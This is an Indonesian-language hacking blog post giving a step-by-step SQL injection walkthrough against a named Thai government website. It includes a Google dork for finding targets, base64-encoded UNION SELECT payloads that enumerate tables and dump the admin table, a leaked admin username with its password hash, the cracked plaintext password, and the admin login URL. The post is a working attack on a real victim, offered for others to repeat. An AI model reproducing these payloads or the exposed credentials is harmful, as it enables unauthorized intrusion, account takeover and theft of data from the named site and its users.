Featured Post
1. Pertama kalian cari dulu parameter webnya, buat inject
site:dwf72.go.th inurl:php?id=
2. Buat sql base64 ini kalian butuh apk or tools online buat encode decode base64 nya
https://play.google.com/store/apps/details?id=duy.com.text_converter
3. Kalian pilih choose method, lalu klik base64
Lalu kalian masukan angka parameternya 184
Maka akan keluar encodenya MTg0==
4. Pada angka 184 kalian kasi '
Jadi
184'
Setelah itu kalian salin hasil encodenya
MTg0Jw==
Lalu paste diparam seperti ini
http://dwf72.go.th/news.php?id=MTg0Jw==
Maka akan keluar error/vuln
5. Kalian lakukan order by seperti saat sql-i biasa
Tapi encode dalam bentuk base64
184 order by 1 -- -
Lalu salin hasil encodenya ke parameternya, sampai error ya
(order by 27) normal
http://dwf72.go.th/news.php?id=MTg0IG9yZGVyIGJ5IDI3IC0tIC0=
(order by 28) error
http://dwf72.go.th/news.php?id=MTg0IG9yZGVyIGJ5IDI4IC0tIC0=
artinya kita cuma menggunakan 1 - 27 saja
6. Kita encode lagi:
-184 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -
Hasil:
LTE4NCB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcgLS0gLQ==
Lalu masukan ks parameter webnya lagi:
http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcgLS0gLQ==
Dan keluar angka togelnya
7. Lanjut ke tahap dump
Kita encode lagi:
-184 union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -
Hasil:
LTE4NCB1bmlvbiBzZWxlY3QgMSwyLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=
Lalu kita masukan lagi ke parameternya:
http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=
Dan akan muncul tablenya
8. Selanjutnya kita scroll kebawah lalu cari table username & password
9. Lalu kita dump, tapi jangan lupa encode dulu
-184 union select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -
Hasil:
LTE4NCB1bmlvbiBzZWxlY3QgMSwyLChTRUxFQ1QoQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChTRUxFQ1QoQHgpRlJPTShhZG1pbilXSEVSRShAeClJTihAeDo9Q09OQ0FUKDB4MjAsQHgsdXNlcm5hbWUsMHgyMDNhM2EyMCxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=
Link:
http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLChTRUxFQ1QoQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChTRUxFQ1QoQHgpRlJPTShhZG1pbilXSEVSRShAeClJTihAeDo9Q09OQ0FUKDB4MjAsQHgsdXNlcm5hbWUsMHgyMDNhM2EyMCxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=
Dan disini maka akan terlihat username passwordnya
10. Lalu kita ambil paling atas
sirinthip :: d01e270f53588fa9dcecd95968fba56374fc85ab
Untuk
user : sirinthip
password : hash dulu
Kita hash
d01e270f53588fa9dcecd95968fba56374fc85ab
Disini:
https://hashes.com/en/decrypt/hash
11. Lalu kalian salin hasilnya:
d01e270f53588fa9dcecd95968fba56374fc85ab:puypam
Jadi
user : sirinthip
password : puypam
12. Lalu kita cari adlognya dulu
http://dwf72.go.th/login
Ini adlognya
13. Dan kalian tinggal Login
Jika sudah maka akan tampil dasboard admin
Related Posts
Post a Comment
Archive
- December 2021 (3)
- November 2021 (3)
- October 2021 (2)
- September 2021 (8)
- August 2021 (4)
- July 2021 (6)
- April 2021 (12)
- March 2021 (12)
- February 2021 (14)
Popular
-
Ok guys Kembali lagi bersama gua ./numb_404 Guys Ya, oke kali ini gua akan memberikan tutorial SQL…
-
Assalamualaikum wr.wb Kali ini saya akan memberikan sedikit materi tentang membikin/membuat server…
-
Assalamualaikum wr wb Oke guys kembali lagi bersama gw Lkey7,Disini gw mau share tools BCA v2. Ma…